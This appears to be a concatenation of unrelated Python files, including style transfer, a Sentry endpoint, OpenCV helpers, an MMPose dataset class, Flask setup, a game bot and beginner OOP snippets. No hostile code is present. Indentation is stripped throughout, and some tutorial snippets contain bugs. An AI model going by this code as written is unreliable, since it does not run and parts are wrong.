square_ = keras.backend.square(style_gram - combination_gram)
sum_ = keras.backend.sum(square_)
result = sum_ / scaling_factor
return result
def total_variation_loss(x, img_height, img_width):
a_ = x[:, :img_height - 1, :img_width - 1, :] - x[:, 1:, :img_width - 1, :]
a = keras.backend.square(a_)
b_ = x[:, :img_height - 1, :img_width - 1, :] - x[:, :img_height - 1, 1:, :]
b = keras.backend.square(b_)
c = keras.backend.pow(a + b, 1.25)
result = keras.backend.sum(c)
return result
class Evaluator(object):
def __init__(self, fetch_loss_and_grads, img_height, img_width):
self.loss_value = None
self.grad_values = None
self.fetch_loss_and_grads = fetch_loss_and_grads
self.img_height = img_height
self.img_width = img_width
def loss(self, x):
assert self.loss_value is None
x = x.reshape((1, self.img_height, self.img_width, 3))
outs = self.fetch_loss_and_grads([x])
loss_value = outs[0]
grad_values = outs[1].flatten().astype('float64')
self.loss_value = loss_value
self.grad_values = grad_values
return self.loss_value
def grads(self, x):
assert self.loss_value is not None
grad_values = np.copy(self.grad_values)
self.loss_value = None
self.grad_values = None
return grad_values
def plot_results(generated_image, target_image_path, style_reference_image_path, img_height, img_width):
plt.imshow(keras.preprocessing.image.load_img(target_image_path, target_size=(img_height, img_width)))
plt.figure()
plt.imshow(keras.preprocessing.image.load_img(style_reference_image_path, target_size=(img_height, img_width)))
plt.figure()
plt.imshow(generated_image)
plt.show()
def load_model(target_image_path, style_reference_image_path, img_height, img_width):
target_image_ = preprocess_image(target_image_path, img_height, img_width)
style_image_ = preprocess_image(style_reference_image_path, img_height, img_width)
if use_keras:
target_image = keras.backend.constant(target_image_)
style_reference_image = keras.backend.constant(style_image_)
combination_image = keras.backend.placeholder((1, img_height, img_width, 3))
input_tensor = keras.backend.concatenate([target_image, style_reference_image, combination_image], axis=0)
model = keras.applications.vgg19.VGG19(input_tensor=input_tensor, weights='imagenet', include_top=False)
print('Model loaded.')
else:
target_image = cntk.constant(value=target_image_)
style_reference_image = cntk.constant(value=style_image_)
combination_image = cntk.placeholder(shape=(1, 3, img_height, img_width))
input_tensor = cntk.ops.splice(target_image, style_reference_image, combination_image, axis=0)
print(input_tensor.output.shape)
quit()
return model, combination_image
def create_loss_criterion(model, combination_image, img_height, img_width):
outputs_dict = dict([(layer.name, layer.output) for layer in model.layers])
content_layer = 'block5_conv2'
style_layers = ['block1_conv1', 'block2_conv1', 'block3_conv1', 'block4_conv1', 'block5_conv1']
total_variation_weight = 1e-4
style_weight = 1.
content_weight = 0.025
loss = keras.backend.variable(0.)
layer_features = outputs_dict[content_layer]
target_image_features = layer_features[0, :, :, :]
combination_features = layer_features[2, :, :, :]
loss += content_weight * content_loss(target_image_features, combination_features)
for layer_name in style_layers:
layer_features = outputs_dict[layer_name]
style_reference_features = layer_features[1, :, :, :]
combination_features = layer_features[2, :, :, :]
sl = style_loss(style_reference_features, combination_features, img_height, img_width)
loss += (style_weight / len(style_layers)) * sl
loss += total_variation_weight * total_variation_loss(combination_image, img_height, img_width)
return loss
def style_transfer():
training_start_time = time.time()
target_image_path = '../DeepLearning/Ch_08_Neural_Style_Transfer/portrait.png'
style_reference_image_path = '../DeepLearning/Ch_08_Neural_Style_Transfer/popova.png'
img_height = 400
img_width = 381
model, combination_image = load_model(target_image_path, style_reference_image_path, img_height, img_width)
img = run_keras(model, combination_image, target_image_path, img_height, img_width)
print('Training Elapsed time: {0}'.format(datetime.timedelta(seconds=time.time() - training_start_time)))
plot_results(img, target_image_path, style_reference_image_path, img_height, img_width)
def run_keras(model, combination_image, target_image_path, img_height, img_width):
import scipy.optimize
loss = create_loss_criterion(model, combination_image, img_height, img_width)
grads = keras.backend.gradients(loss, combination_image)[0]
fetch_loss_and_grads = keras.backend.function([combination_image], [loss, grads])
evaluator = Evaluator(fetch_loss_and_grads, img_height, img_width)
x = preprocess_image(target_image_path, img_height, img_width)
x = x.flatten()
for i in range(5):
print('Start of iteration', i)
iteration_start_time = time.time()
x, min_val, info = scipy.optimize.fmin_l_bfgs_b(evaluator.loss, x, fprime=evaluator.grads, maxfun=20)
print('Current loss value:', min_val)
iteration_end_time = time.time()
print('Iteration %d completed in %ds' % (i, iteration_end_time - iteration_start_time))
img = x.copy().reshape((img_height, img_width, 3))
img = deprocess_image(img)
return img
if __name__ == '__main__':
style_transfer()
|
#!/usr/bin/env python
"""Client VFS handlers module root."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
|
from __future__ import absolute_import
from django.db.models import Q
from operator import or_
from rest_framework.response import Response
from six.moves import reduce
from sentry.api.bases.organization import OrganizationEndpoint
from sentry.api.serializers import serialize
from sentry.api.serializers.models.group import TagBasedStreamGroupSerializer
from sentry.models import (EventUser, Group, GroupTagValue)
class OrganizationUserIssuesEndpoint(OrganizationEndpoint):
def get(self, request, organization, user_id):
limit = request.GET.get('limit', 100)
euser = EventUser.objects.select_related('project__team').get(
project__organization=organization,
id=user_id,
)
# they have organization access but not to this project, thus
# they shouldn't be able to see this user
if not request.access.has_team_access(euser.project.team):
return Response([])
other_eusers = euser.find_similar_users(request.user)
event_users = [euser] + list(other_eusers)
if event_users:
tag_filters = [Q(value=eu.tag_value, project_id=eu.project_id) for eu in event_users]
tags = GroupTagValue.objects.filter(
reduce(or_, tag_filters),
key='sentry:user',
).order_by('-last_seen')[:limit]
else:
tags = GroupTagValue.objects.none()
tags = {t.group_id: t for t in tags}
if tags:
groups = sorted(
Group.objects.filter(
id__in=tags.keys(),
).order_by('-last_seen')[:limit],
key=lambda x: tags[x.id].last_seen,
reverse=True,
)
else:
groups = []
context = serialize(
groups, request.user, TagBasedStreamGroupSerializer(
stats_period=None,
tags=tags,
)
)
return Response(context)
|
from .manager import Manager, ModelType, QuerySet, ListManager
from .related import one_to_many, one_to_one, get_manager
from .model import Model
from .schema import ListField
|
from django.apps import AppConfig
class SharingcenterConfig(AppConfig):
name = 'sharingCenter'
|
# -*- coding: utf-8 -*-
import cv2 as cv
import numpy as np
from os import listdir
from os import path
from glob import glob
def GetContours(image, thresh=150):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
grayBlur = cv.blur(gray, (3, 3))
canny = cv.Canny(grayBlur, thresh, thresh * 2)
contours = cv.findContours(canny, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)[0]
return contours
def GetContourProperties(contours):
centerList = []
arcLengthList = []
boundRectList = []
for contour in contours:
poly = cv.approxPolyDP(contour, 3, True)
mu = cv.moments(poly)
cx = mu['m10'] / (mu['m00'] + 1e-5)
cy = mu['m01'] / (mu['m00'] + 1e-5)
center = (cx, cy)
arcLength = cv.arcLength(poly, True)
boundRect = cv.boundingRect(poly)
centerList.append(center)
arcLengthList.append(arcLength)
boundRectList.append(boundRect)
return centerList, arcLengthList, boundRectList
def CreateRectGroups(rects, minW, minH):
res = []
while len(rects) > 0:
rect = rects.pop(0)
while True:
changed = False
rectsUnused = []
for rect2 in rects:
if not RectIsIntersected(rect, rect2):
rectsUnused.append(rect2)
continue
if rect[2] > minW and rect[3] > minH:
res.append(rect)
if rect2[2] > minW and rect2[3] > minH:
res.append(rect2)
rect = RectUnite(rect, rect2)
changed = True
rects = rectsUnused
if not changed:
break
res.append(rect)
return res
def RectIsIntersected(a, b):
x = max(a[0], b[0])
y = max(a[1], b[1])
w = min(a[0] + a[2], b[0] + b[2]) - x
h = min(a[1] + a[3], b[1] + b[3]) - y
if w < 0 or h < 0:
return False
return True
def RectUnite(a, b):
x = min(a[0], b[0])
y = min(a[1], b[1])
w = max(a[0] + a[2], b[0] + b[2]) - x
h = max(a[1] + a[3], b[1] + b[3]) - y
return x, y, w, h
def RemoveFloor(image, hsvMin=(0, 0, 185), hsvMax=(0, 0, 195)):
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
mask = 255 - cv.inRange(hsv, hsvMin, hsvMax)
return cv.bitwise_and(image, image, None, mask)
def RemoveSocialDistance(image, hsvMin=(40, 0, 0), hsvMax=(45, 255, 255)):
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
mask = 255 - cv.inRange(hsv, hsvMin, hsvMax)
return cv.bitwise_and(image, image, None, mask)
def ExtractSocialDistance(image, hsvMin=(40, 0, 0), hsvMax=(45, 255, 255)):
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
mask = cv.inRange(hsv, hsvMin, hsvMax)
return cv.bitwise_and(image, image, None, mask)
def GetHogDescriptor(winSize=(20, 20),
blockSize=(10, 10),
blockStride=(5, 5),
cellSize=(10, 10),
nbins=9,
derivAperture=1,
winSigma=-1,
histogramNormType=0,
L2HysThreshold=0.2,
gammaCorrection=1,
nlevels=64,
useSignedGradients=True):
return cv.HOGDescriptor(winSize, blockSize, blockStride,
cellSize, nbins, derivAperture,
winSigma, histogramNormType, L2HysThreshold,
gammaCorrection, nlevels, useSignedGradients)
def ResizeHog(image, w=64, h=128):
return cv.resize(image, (w, h))
def GetTrainedSvm():
data = []
dataTypes = []
dataDir = path.join('/', 'data')
for i, subdir in enumerate(listdir(dataDir)):
dataTypes.append(subdir)
data.append([])
for dataPath in glob(path.join(dataDir, subdir, '*.png')):
image = cv.imread(dataPath)
image = RemoveFloor(image)
image = RemoveSocialDistance(image)
data[i].append(image)
hog = GetHogDescriptor()
descriptors = []
for i, images in enumerate(data):
descriptors.append([])
for image in images:
resized = ResizeHog(image)
descriptors[i].append(hog.compute(resized))
trainLabels = []
trainDescriptors = []
for label, descriptor in enumerate(descriptors):
for des in descriptor:
trainLabels.append(label)
trainDescriptors.append(des)
trainLabels = np.array(trainLabels)
trainDescriptors = np.array(trainDescriptors)
svm = cv.ml.SVM_create()
svm.trainAuto(trainDescriptors, cv.ml.ROW_SAMPLE, trainLabels)
return svm, dataTypes
def GetRectCenter(rect):
x, y, w, h = rect
return x + w / 2.0, y + h / 2.0
def LineIsIntersected(line1, line2, eps=1e-7):
a1 = np.array(line1[0])
a2 = np.array(line1[1])
b1 = np.array(line2[0])
b2 = np.array(line2[1])
if abs(np.cross(a2 - a1, b2 - b1)) < eps:
return False
if np.cross(a2 - a1, b1 - a1) * np.cross(a2 - a1, b2 - a1) > eps:
return False
if np.cross(b2 - b1, a1 - b1) * np.cross(b2 - b1, a2 - b1) > eps:
return False
return True
def GetIntersection(line1, line2):
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / float(div)
y = det(d, ydiff) / float(div)
return x, y
def GetPointDistance(a, b):
a = np.array(a)
b = np.array(b)
return np.linalg.norm(a - b)
def GetRectDistance(rect1, rect2):
if RectIsIntersected(rect1, rect2):
return 0.0
c1 = GetRectCenter(rect1)
c2 = GetRectCenter(rect2)
intersections = []
for rect in [rect1, rect2]:
x, y, w, h = rect
a = (x, y)
b = (x, y + h)
c = (x + w, y + h)
d = (x + w, y)
for line in [(a, b), (b, c), (c, d), (d, a)]:
if not LineIsIntersected(line, (c1, c2)):
continue
intersected = line
break
intersection = GetIntersection(intersected, (c1, c2))
intersections.append(intersection)
distance = GetPointDistance(*intersections)
return distance
|
#Python Arrays
#--------------------------------------------------------------------------------------------------------
#Python Classes and Objects
class MyClass:
x = 5
hola=MyClass()
print(hola.x)
##
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
p1 = Person("John", 36)
print(p1.name)
print(p1.age)
##
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def myfunc(self):
print("Hello my name is " + self.name)
p1 = Person("John", 36)
p1.myfunc()
print(p1.age)
#--------------------------------------------------------------------------------------------------------
#Python Inheritance
#Create a Parent Class
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
#Use the Person class to create an object, and then execute the printname method:
x = Person("John", "Doe")
x.printname()
#Adddd the __init__() Function
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
Person.__init__(self, fname, lname)
x = Student("Mike", "Olsen")
x.printname()
##Use the super() Function
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(fname, lname)
x = Student("Mike", "Olsen")
x.printname()
##
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
Person.__init__(self,fname, lname)
x = Student("Mike", "Olsen")
x.printname()
##
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(self,fname, lname)
self.graduationyear = 201
x = Student("Mike", "Olsen")
print(x.graduationyear)
##
class Person():
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(fname, lname)
self.graduationyear = 2019
casa = Student("Mike", "Olsen")
print(x.graduationyear)
#--------------------------------------------------------------------------------------------------------
class Person:
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname):
super().__init__(fname, lname)
self.graduationyear = 2019
x = Student("Mike", "Olsen")
print(x.graduationyear)
#--------------------------------------------------------------------------------------------------------
mytuple = ["apple", "banana", "cherry"]
myit = iter(mytuple)
print(myit)
print(next(myit))
print(next(myit))
print(next(myit))
#--------------------------------------------------------------------------------------------------------
username = input("Enter username:")
print("Username is: " + username)
#--------------------------------------------------------------------------------------------------------
#"r" - Read - Default value. Opens a file for reading, error if the file does not exist
#"a" - Append - Opens a file for appending, creates the file if it does not exist
#"w" - Write - Opens a file for writing, creates the file if it does not exist
#"x" - Create - Creates the specified file, returns an error if the file exists
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------
|
from __future__ import annotations
from typing import Callable, Union, Tuple
from fn import F
from ..util import dict_add
class Args(F):
"""
A variable wrapper for pipe operations.
Args:
args, kwargs: The arguments to be passed to the pipe.
Examples::
from tensorneko.util import __, _
result = __(20) >> (_ + 1) >> (_ * 2) >> __.get
print(result)
# 42
"""
def __init__(self, *args, **kwargs):
super().__init__()
self.args = args
self.kwargs = kwargs
def __ensure_callable(self, inputs):
return Args(*(self.args + inputs), **self.kwargs) if isinstance(inputs, tuple) else inputs
def __lshift__(self, g):
"""Overload << operator for Input and F instances"""
raise ValueError("The Args instance cannot be the end of a pipe.")
def __rshift__(self, g: Union[Callable, Tuple, Args, F]) -> Union[Args, any]:
"""Overload >> operator for F instances"""
if type(g) is Args:
return Args(*(self.args + g.args), **(dict_add(self.kwargs, g.kwargs)))
elif isinstance(g, tuple):
return self.__ensure_callable(g)
elif any(map(lambda getter: g is getter, (Args.get, Args.get_args, Args.get_value, Args.get_kwargs))):
return g(self)
else:
return Args(g(*self.args, **self.kwargs))
def __call__(self, *args, **kwargs):
"""Overload apply operator"""
raise TypeError("The 'Args' is not callable")
def __repr__(self):
kwargs_str = ""
for k, v in self.kwargs.items():
kwargs_str = f"{kwargs_str}, {k}={v}"
return f"({', '.join(map(str, self.args))}{kwargs_str})"
def get(self) -> any:
return self.args[0]
def get_args(self) -> tuple:
return self.args
def get_kwargs(self) -> dict:
return self.kwargs
def get_value(self, key: str) -> dict:
return self.kwargs[key]
|
a = 10
b = 20
c =30
d = 8
print("helloworld")
|
# Copyright (c) OpenMMLab. All rights reserved.
import os
import warnings
import numpy as np
from mmcv import Config
from xtcocotools.cocoeval import COCOeval
from ...builder import DATASETS
from .topdown_coco_dataset import TopDownCocoDataset
@DATASETS.register_module()
class TopDownCocoWholeBodyDataset(TopDownCocoDataset):
"""CocoWholeBodyDataset dataset for top-down pose estimation.
`Whole-Body Human Pose Estimation in the Wild' ECCV'2020
More details can be found in the `paper
<https://arxiv.org/abs/2007.11858>`__ .
The dataset loads raw features and apply specified transforms
to return a dict containing the image tensors and other information.
In total, we have 133 keypoints for wholebody pose estimation.
COCO-WholeBody keypoint indexes::
0-16: 17 body keypoints
17-22: 6 foot keypoints
23-90: 68 face keypoints
91-132: 42 hand keypoints
Args:
ann_file (str): Path to the annotation file.
img_prefix (str): Path to a directory where images are held.
Default: None.
data_cfg (dict): config
pipeline (list[dict | callable]): A sequence of data transforms.
dataset_info (DatasetInfo): A class containing all dataset info.
test_mode (bool): Store True when building test or
validation dataset. Default: False.
"""
def __init__(self,
ann_file,
img_prefix,
data_cfg,
pipeline,
dataset_info=None,
test_mode=False):
if dataset_info is None:
warnings.warn(
'dataset_info is missing. '
'Check https://github.com/open-mmlab/mmpose/pull/663 '
'for details.', DeprecationWarning)
cfg = Config.fromfile('configs/_base_/datasets/coco_wholebody.py')
dataset_info = cfg._cfg_dict['dataset_info']
super(TopDownCocoDataset, self).__init__(
ann_file,
img_prefix,
data_cfg,
pipeline,
dataset_info=dataset_info,
test_mode=test_mode)
self.use_gt_bbox = data_cfg['use_gt_bbox']
self.bbox_file = data_cfg['bbox_file']
self.det_bbox_thr = data_cfg.get('det_bbox_thr', 0.0)
self.use_nms = data_cfg.get('use_nms', True)
self.soft_nms = data_cfg['soft_nms']
self.nms_thr = data_cfg['nms_thr']
self.oks_thr = data_cfg['oks_thr']
self.vis_thr = data_cfg['vis_thr']
self.body_num = 17
self.foot_num = 6
self.face_num = 68
self.left_hand_num = 21
self.right_hand_num = 21
self.db = self._get_db()
print(f'=> num_images: {self.num_images}')
print(f'=> load {len(self.db)} samples')
def _load_coco_keypoint_annotation_kernel(self, img_id):
"""load annotation from COCOAPI.
Note:
bbox:[x1, y1, w, h]
Args:
img_id: coco image id
Returns:
dict: db entry
"""
img_ann = self.coco.loadImgs(img_id)[0]
width = img_ann['width']
height = img_ann['height']
num_joints = self.ann_info['num_joints']
ann_ids = self.coco.getAnnIds(imgIds=img_id, iscrowd=False)
objs = self.coco.loadAnns(ann_ids)
# sanitize bboxes
valid_objs = []
for obj in objs:
x, y, w, h = obj['bbox']
x1 = max(0, x)
y1 = max(0, y)
x2 = min(width - 1, x1 + max(0, w - 1))
y2 = min(height - 1, y1 + max(0, h - 1))
if ('area' not in obj or obj['area'] > 0) and x2 > x1 and y2 > y1:
obj['clean_bbox'] = [x1, y1, x2 - x1, y2 - y1]
valid_objs.append(obj)
objs = valid_objs
rec = []
bbox_id = 0
for obj in objs:
if max(obj['keypoints']) == 0:
continue
joints_3d = np.zeros((num_joints, 3), dtype=np.float32)
joints_3d_visible = np.zeros((num_joints, 3), dtype=np.float32)
keypoints = np.array(obj['keypoints'] + obj['foot_kpts'] +
obj['face_kpts'] + obj['lefthand_kpts'] +
obj['righthand_kpts']).reshape(-1, 3)
joints_3d[:, :2] = keypoints[:, :2]
joints_3d_visible[:, :2] = np.minimum(1, keypoints[:, 2:3] > 0)
center, scale = self._xywh2cs(*obj['clean_bbox'][:4])
image_file = os.path.join(self.img_prefix, self.id2name[img_id])
rec.append({
'image_file': image_file,
'center': center,
'scale': scale,
'rotation': 0,
'joints_3d': joints_3d,
'joints_3d_visible': joints_3d_visible,
'dataset': self.dataset_name,
'bbox_score': 1,
'bbox_id': bbox_id
})
bbox_id = bbox_id + 1
return rec
def _coco_keypoint_results_one_category_kernel(self, data_pack):
"""Get coco keypoint results."""
cat_id = data_pack['cat_id']
keypoints = data_pack['keypoints']
cat_results = []
for img_kpts in keypoints:
if len(img_kpts) == 0:
continue
_key_points = np.array(
[img_kpt['keypoints'] for img_kpt in img_kpts])
key_points = _key_points.reshape(-1,
self.ann_info['num_joints'] * 3)
cuts = np.cumsum([
0, self.body_num, self.foot_num, self.face_num,
self.left_hand_num, self.right_hand_num
]) * 3
result = [{
'image_id': img_kpt['image_id'],
'category_id': cat_id,
'keypoints': key_point[cuts[0]:cuts[1]].tolist(),
'foot_kpts': key_point[cuts[1]:cuts[2]].tolist(),
'face_kpts': key_point[cuts[2]:cuts[3]].tolist(),
'lefthand_kpts': key_point[cuts[3]:cuts[4]].tolist(),
'righthand_kpts': key_point[cuts[4]:cuts[5]].tolist(),
'score': float(img_kpt['score']),
'center': img_kpt['center'].tolist(),
'scale': img_kpt['scale'].tolist()
} for img_kpt, key_point in zip(img_kpts, key_points)]
cat_results.extend(result)
return cat_results
def _do_python_keypoint_eval(self, res_file):
"""Keypoint evaluation using COCOAPI."""
coco_det = self.coco.loadRes(res_file)
cuts = np.cumsum([
0, self.body_num, self.foot_num, self.face_num, self.left_hand_num,
self.right_hand_num
])
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_body',
self.sigmas[cuts[0]:cuts[1]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_foot',
self.sigmas[cuts[1]:cuts[2]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_face',
self.sigmas[cuts[2]:cuts[3]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_lefthand',
self.sigmas[cuts[3]:cuts[4]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_righthand',
self.sigmas[cuts[4]:cuts[5]],
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
coco_eval = COCOeval(
self.coco,
coco_det,
'keypoints_wholebody',
self.sigmas,
use_area=True)
coco_eval.params.useSegm = None
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
stats_names = [
'AP', 'AP .5', 'AP .75', 'AP (M)', 'AP (L)', 'AR', 'AR .5',
'AR .75', 'AR (M)', 'AR (L)'
]
info_str = list(zip(stats_names, coco_eval.stats))
return info_str
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from flask import Flask
from flask_assets import Environment, Bundle
import logging
from logging.handlers import RotatingFileHandler
from platus.web import web
from platus.api import api
from platus.config import config
application = Flask(__name__,\
static_folder="platus/static/",\
template_folder="platus/templates/",
static_url_path="/static")
application.register_blueprint(web)
application.register_blueprint(api)
application.config.update(config.from_yaml("data/config.yaml"))
# Scss
assets = Environment(application)
assets.versions = 'timestamp'
assets.url_expire = True
assets.manifest = 'file:/tmp/manifest.to-be-deployed' # explict filename
assets.cache = False
assets.auto_build = True
assets.url = application.static_url_path
scss = Bundle('scss/00_main.scss', filters='pyscss', output='css/main.css', depends=['scss/*.scss'])
assets.register('scss_all', scss)
assets.debug = False
application.config['ASSETS_DEBUG'] = False
# Set Logger
log_levels = {
"info": logging.INFO,
"debug": logging.DEBUG,
"error": logging.ERROR,
"critical": logging.CRITICAL
}
log_level = log_levels[application.config.get("log_level", "info")]
log = logging.getLogger(__name__)
console_formatter = logging.Formatter(
'%(levelname)s\t%(filename)s:%(lineno)d\t\t%(message)s', '%m-%d %H:%M:%S')
file_formatter = logging.Formatter(
'%(levelname)s - %(asctime)s - %(pathname)s - %(lineno)d - %(message)s', '%m-%d %H:%M:%S')
console_handler = logging.StreamHandler()
console_handler.setLevel(log_level)
console_handler.setFormatter(console_formatter)
rotatingfile_handler = RotatingFileHandler('platus.log', maxBytes=10000, backupCount=1)
rotatingfile_handler.setLevel(log_level)
rotatingfile_handler.setFormatter(file_formatter)
application.logger.addHandler(console_handler)
application.logger.addHandler(rotatingfile_handler)
application.logger.setLevel(log_level)
if __name__ == '__main__':
application.run(host="0.0.0.0", port=5001)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from torch.autograd import Variable
import torch
import os
import matplotlib.pyplot as plt
class TVLoss(torch.nn.Module):
def __init__(self,TVLoss_weight=1):
super(TVLoss,self).__init__()
self.TVLoss_weight = TVLoss_weight
def forward(self,x):
batch_size = x.size()[0]
h_x = x.size()[2]
w_x = x.size()[3]
count_h = self._tensor_size(x[:,:,1:,:])
count_w = self._tensor_size(x[:,:,:,1:])
h_tv = torch.pow((x[:,:,1:,:]-x[:,:,:h_x-1,:]),2).sum()
w_tv = torch.pow((x[:,:,:,1:]-x[:,:,:,:w_x-1]),2).sum()
return self.TVLoss_weight*2*(h_tv/count_h+w_tv/count_w)/batch_size
def _tensor_size(self, t):
return t.size()[1]*t.size()[2]*t.size()[3]
def criterion_TV(inpt):
return torch.sum(torch.abs(inpt[:, :, :, :-1] - inpt[:, :, :, 1:])) + \
torch.sum(torch.abs(inpt[:, :, :-1, :] - inpt[:, :, 1:, :]))
|
def near_islands(game,my_pirate,islands):
nearest = 999999
dist = 0
closest_island=islands[0]
for island in islands:
dist = game.distance(my_pirate,island)
if island.team_capturing == game.NEUTRAL:
dist = dist / 2
if dist<nearest:
nearest = game.distance(my_pirate,island)
closest_island=island
return closest_island
def near_enemies(game,my_pirate,enemies):
nearest = 999999
dist = 0
closest_island=enemies[0]
for enemy in enemies:
dist = game.distance(my_pirate,enemy)
if dist<nearest:
nearest = dist
closest_island=enemy
return closest_island
def do_turn(game):
pirates = game.my_pirates()
if len(pirates) == 0:
return
islands = game.not_my_islands()
enemies = game.enemy_pirates()
if len(islands) == 0:
if len(enemies) != 0:
i = 0
for pirate in pirates:
direction = game.get_directions(pirate, near_enemies(game,pirate,enemies))[0]
game.set_sail(pirate, direction)
i += 1
if i >= len(enemies) or i >= 2:
i = 0
else:
i = 0
isl = list(islands)
for pirate in pirates:
if not game.is_capturing(pirate):
if len(isl) == 0:
isl = list(islands)
direction = game.get_directions(pirate, near_islands(game,pirate,isl))[0]
game.set_sail(pirate, direction)
i += 1
if i >= len(islands) or i >= 2:
i = 0
isl.remove(near_islands(game,pirate,isl))
|
"""
The main script that serves as the entry-point for all kinds of training experiments.
"""
import sys
from pathlib import Path
import pytorch_lightning as pl
from das.data.data_args import DataArguments
from das.data.data_modules.factory import DataModuleFactory
from das.model_analyzer.analyzer_args import AnalysisTaskArguments, AnalyzerArguments
from das.model_analyzer.utils import DataCacher
from das.models.model_args import ModelArguments, ModelFactory
from das.utils.basic_args import BasicArguments
from das.utils.basic_utils import create_logger
logger = create_logger(__name__)
class AnalysisTask:
def __init__(
self,
task_output_name,
basic_args: BasicArguments,
data_args: DataArguments,
model_args: ModelArguments,
analyzer_args: AnalyzerArguments,
analysis_task_args: AnalysisTaskArguments,
) -> None:
self.task_output_name = task_output_name
self.basic_args = basic_args
self.data_args = data_args
self.model_args = model_args
self.analyzer_args = analyzer_args
self.analysis_task_args = analysis_task_args
# setup datamodule
self.datamodule = self.setup_datamodule()
# setup the model
self.model = self.setup_model()
# setup analyser output dir
self.output_dir = self.setup_output_dir()
# setup data caching
self.data_cachers = {}
for cacher_type in ["pickle", "json"]:
self.data_cachers[cacher_type] = self.setup_data_cacher(cacher_type)
def setup_datamodule(self):
# initialize data-handling module, set collate_fns later
datamodule = DataModuleFactory.create_datamodule(
self.basic_args, self.data_args
)
# prepare the modules
datamodule.prepare_data()
datamodule.setup()
self.num_labels = datamodule.num_labels
self.labels = datamodule.labels
# set datamdule
return datamodule
def setup_output_dir(self):
output_dir = (
Path(self.analyzer_args.analyzer_output_dir) / self.data_args.dataset_name
)
if self.analyzer_args.output_data_subdir != "":
output_dir = output_dir / self.analyzer_args.output_data_subdir
output_dir = output_dir / self.model.model_name
if not output_dir.exists():
output_dir.mkdir(parents=True)
return output_dir
def setup_data_cacher(self, cacher_type):
return DataCacher(self.output_dir, cacher_type=cacher_type)
def setup_model(self):
# get model class
model_class = ModelFactory.get_model_class(
self.model_args.model_name, self.model_args.model_task
)
# intialize the lightning module for training
model = model_class(
self.basic_args,
self.model_args,
training_args=None,
data_args=self.data_args,
datamodule=self.datamodule,
)
# if model checkpoint is present, use it to load the weights
if self.model_args.model_checkpoint_file is None:
# intialize the model for training
model = model_class(
self.basic_args,
self.model_args,
training_args=None,
data_args=self.data_args,
datamodule=self.datamodule,
)
else:
if not self.model_args.model_checkpoint_file.startswith("http"):
